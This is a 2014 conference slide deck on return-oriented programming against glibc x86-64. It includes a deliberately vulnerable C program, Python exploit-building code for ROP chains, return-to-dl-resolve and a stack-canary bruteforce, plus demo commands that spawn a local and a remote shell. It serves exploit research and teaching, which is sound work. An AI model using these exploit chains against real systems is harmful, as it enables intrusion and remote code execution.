rop illmatic: exploring universal rop on glibc x86-64 (en)
2014/11/15 AVTOKYO2014 (English Version)
Japanese Version: http://www.slideshare.net/inaz2/rop-illmatic-exploring-universal-rop-on-glibc-x8664-ja
ROP ILLMATIC: EXPLORING UNIVERSAL ROP
ON GLIBC X86-64
@inaz2
AVTOKYO2014
2014/11/15
English version
ABOUT ME
• @inaz2
• Security Engineer & Python Programmer
• Japanese Girls Idol Freak
• Weblog “Momoiro Technology” (momoiro = pink color)
• http://inaz2.hatenablog.com/
“ILLMATIC” ?
• http://en.wikipedia.org/wiki/Illmatic
• coined word by the American rapper Nas
• "supreme ill. It's as ill as ill gets. That s*** is a science of
everything ill."
BACKGROUND
• About arbitrary code execution via buffer overflow vuln. etc.
• Document: “Security mitigations are implemented”
• To what extent can we bypass them?
• Paper: “If there is sufficient executable memory at fixed
address, …”
• Rumor: “Difficult because of lack of executable memory at
fixed address on x86-64”
• No universal method effective when executable memory is small?
ENVIRONMENT
• Latest Ubuntu Linux on x86-64 architecture
$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
Description: Ubuntu 14.04.1 LTS
$ gcc --version
gcc (Ubuntu 4.8.2-19ubuntu1) 4.8.2
$ clang --version
Ubuntu clang version 3.4-1ubuntu3 (tags/RELEASE_34/final) (based on LLVM 3.4)
VULNERABLE CODE
• Minimum C code including stack buffer overflow vuln.
#include <unistd.h>

int main()
{
    char buf[100];
    int size;
    read(0, &size, 8);
    read(0, buf, size);   /* possible to write more than buffer size here */
    write(1, buf, size);
    return 0;
}
HOW THE CODE IS EXECUTED
• The rip register holds the address of the insn. to be executed next
• Function call on x86-64
• call insn. pushes the address of the next insn. to the stack and
changes rip
• ret insn. pops the address from the stack and restores rip
• Library function call of ELF
• Every object has GOT (Global Offset Table) and PLT (Procedure
Linkage Table) sections
• GOT is the address table of library functions
• PLT is the entry point to jump to each address placed in GOT
• Do the indirect jump through PLT
SMASHING THE STACK [PHRACK 49]
• Published in 1996, written by Aleph One
• Overwrite return address of the function and point it to the
shellcode
[Figure: stack layout toward higher addresses: buf[100] (shellcode), saved ebp (AAAA), return address (&buf)]
SECURITY MITIGATIONS
• Enabled by default
• NX/DEP
• ASLR
• Stack canary
• Additional options
• RELRO + BIND_NOW (FullRELRO)
• FORTIFY_SOURCE
• PIE
NX/DEP (DATA EXECUTION PREVENTION)
• Prohibit the execution of rewritable memory (= data)
• Execution of the shellcode in stack/heap region is aborted
$ cat /proc/$$/maps
00400000-004ef000 r-xp 00000000 fc:00 265344 /bin/bash
006ef000-006f0000 r--p 000ef000 fc:00 265344 /bin/bash
006f0000-006f9000 rw-p 000f0000 fc:00 265344 /bin/bash
006f9000-006ff000 rw-p 00000000 00:00 0
01cb0000-01ed1000 rw-p 00000000 00:00 0 [heap]
...
7fffe374e000-7fffe376f000 rw-p 00000000 00:00 0 [stack]
ROP (RETURN-ORIENTED PROGRAMMING)
[BH USA 2008]
• Overwrite return address and point it to executable code
• Return to the code chunk ending with ret insn. (ROP gadget)
repeatedly
• More generally, when gadgets ending with jmp/call insn. are also used, it is called a code-reuse attack
[Figure: stack layout toward higher addresses: buf[100] holds "/bin/sh\x00"; the return address is overwritten with &gadget (pop rdi; ret;), followed by &buf and &system, so that system(“/bin/sh”) runs]
X86-64 CALLING CONVENTIONS
• On x86-64, function arguments are passed by registers
• Ordered by rdi, rsi, rdx, rcx, r8, r9
• Need to set value to each register before returning to function
• “pop rdi; ret” / “pop rsi; ret” / “pop rdx; ret” / …
• Often some of these gadgets don’t exist at a fixed address
LIBC_CSU_INIT GADGETS
• Use code chunks in __libc_csu_init function embedded in
almost all executables
• Arbitrary function call with up to 3 arguments can be performed
• 4th argument (rcx) can be manipulated by memset/memcpy
(1) loc_400626
move values from stack to registers
(2) loc_400610
set arguments and call [r12+rbx*8]
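The two gadgets above could be chained roughly as follows. This is only a sketch in Python 3: the register assignment (which popped register feeds rdi, rsi and rdx) is an assumption about one particular gcc build and has to be checked against the disassembly of the actual target. The names csu_call, addr_pop and addr_call are hypothetical.

```python
import struct

def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack('<Q', value)

def csu_call(addr_pop, addr_call, func_ptr, arg1, arg2, arg3, next_rip):
    """Build a chain that performs call [func_ptr](arg1, arg2, arg3).

    Assumed gadget bodies (verify against the target's disassembly):
      addr_pop : add rsp, 8; pop rbx; pop rbp; pop r12; pop r13; pop r14;
                 pop r15; ret
      addr_call: mov rdx, r13; mov rsi, r14; mov edi, r15d;
                 call [r12+rbx*8]; add rbx, 1; cmp rbx, rbp; jne addr_call
                 (then falls through into addr_pop)
    """
    chain = p64(addr_pop)
    chain += p64(0)            # skipped by "add rsp, 8"
    chain += p64(0)            # rbx = 0, so the call target is [r12]
    chain += p64(1)            # rbp = 1, so the loop exits after one call
    chain += p64(func_ptr)     # r12 = address of a function pointer (e.g. a GOT entry)
    chain += p64(arg3)         # r13 -> rdx
    chain += p64(arg2)         # r14 -> rsi
    chain += p64(arg1)         # r15 -> edi (only the lower 32 bits are copied)
    chain += p64(addr_call)
    chain += p64(0) * 7        # consumed by the fall-through into addr_pop
    chain += p64(next_rip)     # where execution continues afterwards
    return chain
```

Because the call goes through [r12+rbx*8], func_ptr must be the address of a pointer to the function, which is why GOT entries are a natural fit.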
ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION)
• Randomize the address of stack/heap and shared libraries
• But the address of executable image is still fixed
[Figure: memory layout (a.out, heap, libc.so.6, stack, ordered toward higher addresses) compared between the 1st and 2nd execution]
ROP STAGER USING IO PRIMITIVES
• Send a ROP sequence to a fixed address by using IO functions
in PLT
• read/write, send/recv, fgets/fputs…, something exists in most
cases
• Change the stack pointer to the sent ROP sequence (stack
pivot)
• Swap rsp by setting rbp and executing leave insn.
read@plt        # call read(0, 0x601048, 0x400)
                # 0x601048 = writable address around bss section
pop rbp; ret;   # set rbp=0x601048
leave; ret;     # equiv. to “mov rsp, rbp; pop rbp”
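A minimal Python 3 sketch of the pivot part of this stager, assuming the two gadget addresses have already been found (all addresses passed in are hypothetical). One detail worth making explicit: since leave also pops rbp, the data sent to the fixed address has to start with one dummy word before the actual ROP sequence.

```python
import struct

def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack('<Q', value)

def pivot(addr_pop_rbp, addr_leave_ret, new_stack):
    """Chain fragment that moves rsp to new_stack.

    'pop rbp; ret' loads new_stack into rbp, then 'leave; ret' copies
    rbp into rsp, pops one word into rbp and returns.
    """
    return p64(addr_pop_rbp) + p64(new_stack) + p64(addr_leave_ret)

def second_stage(rop, dummy_rbp=0):
    """Data to place at new_stack: one word for the 'pop rbp' inside
    'leave', followed by the ROP sequence that 'ret' starts executing."""
    return p64(dummy_rbp) + rop
```

The fragment returned by pivot() would follow the read() call in the first stage, and second_stage() is what gets sent to that read().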
DETERMINING LIBRARY FUNCTION ADDRESS
• How to call “system” function at randomized address?
• Read the address of __libc_start_main function on GOT
• Add offset from __libc_start_main to system
• Need to determine the exact libc binary used in the target host
• It can be guessed by the lower bits of the address of
__libc_start_main
$ nm -D -n /lib/x86_64-linux-gnu/libc-2.19.so
0000000000021dd0 T __libc_start_main
0000000000046530 W system
offset = 0x046530 − 0x021dd0 = 0x24760
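The same arithmetic as a small Python 3 sketch. The two offsets are the ones from the nm output above; the function names are hypothetical. The lower-bits check relies on shared libraries being mapped at page-aligned addresses, so the low 12 bits of a leaked address equal those of the symbol's offset in the file.

```python
OFFSET_LIBC_START_MAIN = 0x21dd0   # from the nm output for libc-2.19.so
OFFSET_SYSTEM = 0x46530

def matches_libc(leaked_addr, symbol_offset):
    """True if the lower 12 bits of the leaked address agree with the
    symbol offset of a candidate libc binary."""
    return (leaked_addr & 0xfff) == (symbol_offset & 0xfff)

def system_address(leaked_libc_start_main):
    """Compute the runtime address of system from the leaked address."""
    libc_base = leaked_libc_start_main - OFFSET_LIBC_START_MAIN
    return libc_base + OFFSET_SYSTEM
```

For example, a leaked value of 0x7ffff7a36dd0 (a made-up address) passes the check and gives 0x7ffff7a5b530 for system.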
RETURN-TO-DL-RESOLVE [PHRACK 58]
• Published in 2001, written by Nergal
• Craft a set of symbol-related structures and make the
dynamic linker (_dl_runtime_resolve function) load them
• Arbitrary library function call can be performed without
determining libc binary
buf += struct.pack('<Q', addr_plt)                        # PLT0 jumps to resolver
buf += struct.pack('<Q', offset2rela)
buf += 'NEXT_RIP'
buf += 'A' * alignment1
buf += struct.pack('<QQQ', writable_addr, offset2sym, 0)  # Elf64_Rela
buf += 'A' * alignment2
buf += struct.pack('<IIQQ', offset2symstr, 0x12, 0, 0)    # Elf64_Sym
buf += 'system\x00'                                       # symstr
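How the offsets and alignment values in such a payload might be derived is sketched below in Python 3. On x86-64 the value pushed before jumping to PLT0 is an index into the relocation table, and the symbol is also referenced by index, so both crafted structures must sit at a multiple of 24 bytes from their tables. The function name dl_resolve_data and all section addresses passed to it are hypothetical; real values would come from the target ELF.

```python
import struct

SIZEOF_RELA = 24          # sizeof(Elf64_Rela)
SIZEOF_SYM = 24           # sizeof(Elf64_Sym)
R_X86_64_JUMP_SLOT = 7

def padding(addr, origin, size):
    """Bytes needed so that (addr + pad - origin) is a multiple of size."""
    return (-(addr - origin)) % size

def dl_resolve_data(base, jmprel, dynsym, dynstr, got_slot, name=b'system'):
    """Return (reloc_index, data) where data is to be written at base."""
    pad1 = padding(base, jmprel, SIZEOF_RELA)
    addr_rela = base + pad1
    pad2 = padding(addr_rela + SIZEOF_RELA, dynsym, SIZEOF_SYM)
    addr_sym = addr_rela + SIZEOF_RELA + pad2
    addr_str = addr_sym + SIZEOF_SYM

    reloc_index = (addr_rela - jmprel) // SIZEOF_RELA
    sym_index = (addr_sym - dynsym) // SIZEOF_SYM
    r_info = (sym_index << 32) | R_X86_64_JUMP_SLOT
    st_name = addr_str - dynstr            # offset of the name from .dynstr

    data = b'A' * pad1
    data += struct.pack('<QQq', got_slot, r_info, 0)          # Elf64_Rela
    data += b'A' * pad2
    # st_name, st_info=0x12 (global function), st_other, st_shndx, st_value, st_size
    data += struct.pack('<IBBHQQ', st_name, 0x12, 0, 0, 0, 0)  # Elf64_Sym
    data += name + b'\x00'
    return reloc_index, data
```

The returned reloc_index is the word that follows the PLT0 address on the stack, and got_slot is any writable address where the resolved function address may be stored.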
SKIPPING SYMBOL VERSION CHECK
• Naïve Return-to-dl-resolve fails on x86-64
• SEGV when retrieving the version index of the crafted symbol (*1)
• Read the address of link_map structure in GOT section and
overwrite [link_map+0x1c8] with 0
• Skip the process of retrieving the version info.
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
  {
    const ElfW(Half) *vernum =
      (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
    ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;  // (*1)
    version = &l->l_versions[ndx];
    if (version->hash == 0)
      version = NULL;
  }
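A small worked example of where the read at (*1) lands, as a Python 3 sketch. The symbol index of a crafted symbol is its distance from the symbol table divided by 24 (the size of Elf64_Sym), and each entry of the version table is 2 bytes. The function name and the addresses used in the example are hypothetical.

```python
SIZEOF_SYM = 24    # sizeof(Elf64_Sym)
SIZEOF_HALF = 2    # sizeof(Elf64_Half), one entry of the version table

def vernum_read_address(addr_versym, addr_dynsym, addr_fake_sym):
    """Address read by vernum[ELFW(R_SYM)(reloc->r_info)] for a crafted
    symbol placed at addr_fake_sym."""
    sym_index = (addr_fake_sym - addr_dynsym) // SIZEOF_SYM
    return addr_versym + sym_index * SIZEOF_HALF
```

With a version table at 0x400400, a symbol table at 0x400300 and a crafted symbol at 0x601000, the read goes to 0x42afc0. In a small executable that address lies between the code and data mappings, which would explain the SEGV.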
RELRO + BIND_NOW (FULLRELRO)
• Relocation read-only with lazy binding disabled
• Resolve all GOT addresses and make them read-only at the
beginning of execution
• The address of _dl_runtime_resolve function is not set in the
memory at runtime
• Hard to call it directly
(gdb) x/4gx 0x601000
0x601000: 0x0000000000000000 0x0000000000000000
0x601010: 0x0000000000000000 0x0000000000000000
(gdb) x/4gx 0x601000
0x601000: 0x0000000000600e28 0x00007ffff7ffe1c8
0x601010: 0x00007ffff7df04e0 0x0000000000400456
FullRELRO (0x601000 = address of GOT section)
DT_DEBUG TRAVERSAL
• Look up the value of DT_DEBUG in the dynamic section
• There is the address of r_debug structure (for debugging) at
runtime
• From r_debug, we can traverse link_map structure of each
loaded library
• We can get various addresses through link_map structure
• Determine the address of _dl_runtime_resolve function from
GOT section of the loaded library
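The traversal can be sketched in Python 3 on top of a memory-read primitive. Here read_qword is a hypothetical callback that returns the 8-byte value at an address (in a real exploit each call would be one leak through the ROP stager). The structure offsets used are r_debug.r_map at +8, link_map.l_ld at +16 and link_map.l_next at +24. The sketch also assumes that the DT_PLTGOT value of a loaded library already holds an absolute address in memory and that GOT[2] of a lazily bound library holds the resolver address.

```python
DT_NULL, DT_PLTGOT, DT_DEBUG = 0, 3, 21

def find_dyn(read_qword, addr_dynamic, tag):
    """Walk Elf64_Dyn entries (16 bytes each); return d_val for tag or None."""
    addr = addr_dynamic
    while True:
        d_tag = read_qword(addr)
        if d_tag == tag:
            return read_qword(addr + 8)
        if d_tag == DT_NULL:
            return None
        addr += 16

def find_dl_runtime_resolve(read_qword, addr_dynamic):
    """Follow DT_DEBUG -> r_debug -> link_map list and return the first
    non-zero GOT[2] found in a loaded object, or None."""
    r_debug = find_dyn(read_qword, addr_dynamic, DT_DEBUG)
    if not r_debug:
        return None
    link_map = read_qword(r_debug + 8)           # r_debug.r_map
    while link_map:
        l_ld = read_qword(link_map + 16)         # link_map.l_ld
        got = find_dyn(read_qword, l_ld, DT_PLTGOT) if l_ld else None
        if got:
            resolver = read_qword(got + 16)      # GOT[2] (assumption: resolver)
            if resolver:
                return resolver
        link_map = read_qword(link_map + 24)     # link_map.l_next
    return None
```

The first link_map entry is the executable itself, whose GOT[2] is zero under FullRELRO, so the loop moves on to the libraries.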
LET’S TRY!
• Launch the shell bypassing ASLR+NX/DEP+FullRELRO on
x86-64
1. Use libc_csu_init gadgets for function call
2. Send a ROP sequence to fixed address by using IO primitives
and perform stack pivot
3. Do DT_DEBUG traversal and determine the address of
_dl_runtime_resolve function
4. Call “system” function by Return-to-dl-resolve
DEMO 1
• http://inaz2.hatenablog.com/entry/2014/10/12/191047
• By using gcc, make the executable program with
ASLR+NX/DEP+FullRELRO enabled
• Launch the shell by ROP stager + Return-to-dl-resolve
Enable ASLR:
$ sudo sysctl -w kernel.randomize_va_space=2
Compile with NX/DEP+FullRELRO enabled (w/o stack canary):
$ gcc -fno-stack-protector -Wl,-z,relro,-z,now bof.c
Execute the program and exploit it:
$ python exploit.py 100
IT WORKS, BUT IS TOO COMPLICATED…
DT_DEBUG Traversal requires
read & write 5 times
DYNAMIC ROP
• Or “Just-in-time Code Reuse” [BH USA 2013]
• Read out the whole libc memory and use it
1. Read the address of __libc_start_main function in GOT
2. Read out about 0x160000 bytes from that address
3. Construct a ROP sequence to execute system call by using ROP
gadgets in read-out memory
pop rax; ret;   # set rax=59 (__NR_execve)
pop rdi; ret;   # set rdi="/bin/sh"
pop rsi; ret;   # set rsi={"/bin/sh", NULL}
pop rdx; ret;   # set rdx=NULL
syscall;        # call execve("/bin/sh", {"/bin/sh", NULL}, NULL)
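Finding these gadgets in the read-out memory comes down to a byte search, sketched here in Python 3. The byte strings are the standard x86-64 encodings of the listed instructions; the function name find_gadgets and the dump_addr parameter (the runtime address the dump was read from) are hypothetical.

```python
GADGETS = {
    'pop rax; ret': b'\x58\xc3',
    'pop rdi; ret': b'\x5f\xc3',
    'pop rsi; ret': b'\x5e\xc3',
    'pop rdx; ret': b'\x5a\xc3',
    'syscall':      b'\x0f\x05',
}

def find_gadgets(dump, dump_addr):
    """Map each gadget name to its runtime address, or None if the byte
    sequence does not occur in the dumped memory."""
    found = {}
    for name, code in GADGETS.items():
        index = dump.find(code)
        found[name] = dump_addr + index if index >= 0 else None
    return found
```

Since the bytes are matched at any offset, a hit in the middle of a longer instruction is just as usable as an intended one.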
LEAVE-LESS EXECUTABLES
• Compiling with clang, no leave insn. in function epilogue
• rsp is strictly adjusted by “add rsp, XXh”
• Stack pivot without leave insn. is a pain
• Pivoting to the sent ROP sequence at a fixed address is more difficult
[Figure: gcc vs. clang comparison]
RETURN-TO-VULN
• Return to the same vulnerable function repeatedly
• The next ROP sequence can be executed without stack pivot
[Figure: the vulnerable function is entered repeatedly: 1. Read the address of __libc_start_main, 2. Read the libc memory, 3. Execute system call]
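In payload terms, each round simply ends by returning to the vulnerable function again. A minimal Python 3 sketch, where stage, offset (the number of bytes from the start of the buffer to the return address) and addr_vuln are hypothetical names:

```python
import struct

def stage(offset, rop, addr_vuln):
    """One round of input: padding up to the return address, the ROP
    sequence for this step, then the vulnerable function once more."""
    return b'A' * offset + rop + struct.pack('<Q', addr_vuln)
```

Each of the three steps would be sent as one such stage, with the last one ending in the system call instead of another return.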
ROPUTILS
• https://github.com/inaz2/roputils
• A toolkit for various tasks about ROP
• ELF parsing by readelf command
⇒ getting the address of sections, symbols and useful gadgets
• Building ROP sequence from parameters
• Non-blocking IO over pipes (local) and sockets (remote)
• Generating shellcode for Linux i386 / x86-64
• Checking applied security mitigations
• Creating Metasploit pattern and calculating its offset
[Figure: annotated roputils example script. Annotations: Import all classes; Parse ELF; Getting various addresses; Building a ROP sequence; Non-blocking IO. When the target is remote, change here as Proc(host=x, port=y)]
DEMO 2
• https://github.com/inaz2/roputils/blob/master/examples/libc-dynamic-no-leave-x64.py
• By using clang, make the executable program with
ASLR+NX/DEP+FullRELRO enabled
• Create TCP service by socat
• Launch the remote shell by Dynamic ROP + Return-to-vuln
Enable ASLR and compile with NX/DEP+FullRELRO enabled (w/o stack canary):
$ sudo sysctl -w kernel.randomize_va_space=2
$ clang -fno-stack-protector -Wl,-z,relro,-z,now bof.c
Execute the program as a TCP service:
$ socat tcp-listen:5000,fork,reuseaddr exec:./a.out &
Exploit it:
$ python libc-dynamic-no-leave-x64.py ./a.out 120
HOW ABOUT THE REST?
Stack canary, FORTIFY_SOURCE and PIE
STACK CANARY
• Detect stack buffer overflow by inserting a random value
before the return address
• Abort when the value is changed
• If the target is a simple fork server, byte-by-byte bruteforce is
feasible (up to 256 * 8 = 2048 trials)
• Ineffective against pointer overwrite via Heap overflow / Use-after-free vuln. etc.
[Figure annotation: “Check if the value is changed”]
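The byte-by-byte bruteforce against a fork server can be sketched in Python 3 as below. It works because forked children share the parent's canary, so each byte can be confirmed independently. survives is a hypothetical oracle that sends an overflow ending exactly after the given canary prefix and reports whether the child exited normally.

```python
def bruteforce_canary(survives, length=8):
    """Recover the canary one byte at a time.

    survives(prefix) must return True when overwriting the first
    len(prefix) canary bytes with prefix does not make the child abort.
    """
    known = b''
    for _ in range(length):
        for guess in range(256):
            candidate = known + bytes([guess])
            if survives(candidate):
                known = candidate
                break
        else:
            raise RuntimeError('no byte value survived; canary may have changed')
    return known
```

Each of the 8 positions needs at most 256 connections, which is where the bound of 2048 trials comes from.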
FORTIFY_SOURCE
• Replace dangerous standard functions with the safer ones
• gets → __gets_chk, strcpy → __strcpy_chk, read → __read_chk, …
• Add buffer size check
• Most stack buffer overflow vulns. are fixed
• But ROP stager using *_chk is still possible
• Seek pointer overwrite via Heap overflow / Use-after-free vuln.
etc.
read(0, buf, size)
→ __read_chk(0, buf, size, 100)
PIE (POSITION-INDEPENDENT EXECUTABLES)
• The address of executable image is also randomized
• Only when ASLR is enabled, of course
• Ineffective when it is possible to get the address of something in
the executable or libc (information leak)
• Use other vulns. such as buffer over-read
• Still possible to move the return address by overwriting only
its lower bytes (partial overwrite)
• But generic attack seems difficult
FURTHER MITIGATIONS
• Shadow stack
• StackShield (2000), TRUSS (2008), ROPdefender (2011)
• Keep a copy of the return address in a separate region and verify
against it
• Related: “SCADS: Separated Control- and Data-Stacks” (2014)
• Coarse-grained Control-Flow Integrity (CFI)
• ROPGuard (2012), kBouncer (2013), ROPecker (2014)
• Indirect Branches and Behavior-Based Heuristics policies
• collect valid destinations and verify with them
• restrict the length of consecutive short sequences (by using threshold)
• Can be bypassed if Call-ret-pair gadget and Long-NOP gadget exist
RECAP
• NX/DEP bypass: ROP
• ASLR bypass: ROP stager
• Prerequisite: IO primitives on PLT and sufficient buffer for ROP
• Function call on x86-64: libc_csu_init gadgets
• Library function call: Return-to-dl-resolve
• FullRELRO bypass: DT_DEBUG traversal
• System call execution: Dynamic ROP
• Against leave-less executable: Return-to-vuln
• ROP is illmatic
REFERENCES (1/2)
• "Exploit" article list - Momoiro Technology
• http://inaz2.hatenablog.com/archive/category/Exploit
• Smashing The Stack For Fun And Profit (Phrack 49)
• http://phrack.org/issues/49/14.html
• The advanced return-into-lib(c) exploits: PaX case study (Phrack 58)
• http://phrack.org/issues/58/4.html
• Return-Oriented Programming: Exploits Without Code Injection (Black
Hat USA 2008)
• http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html
• Return to Dynamic Linker (Codegate 2014 Junior)
• http://blog.jinmo123.pe.kr/entry/Codegate-2014-Junior-Presentation
REFERENCES (2/2)
• Ghost in the Shellcode 2014 - fuzzy - Code Arcana
• http://codearcana.com/posts/2014/01/19/ghost-in-the-shellcode-2014-fuzzy.html
• Just-In-Time Code Reuse: The more things change, the more they stay
the same (Black Hat USA 2013)
• https://media.blackhat.com/us-13/US-13-Snow-Just-In-Time-Code-Reuse-Slides.pdf
• SCADS: Separated Control- and Data-Stacks (SECURECOMM 2014)
• https://www1.cs.fau.de/filepool/scads/scads-securecomm2014.pdf
• Stitching the Gadgets: On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection (USENIX Security 2014)
• https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/davi
• And many others
THANK YOU!
@inaz2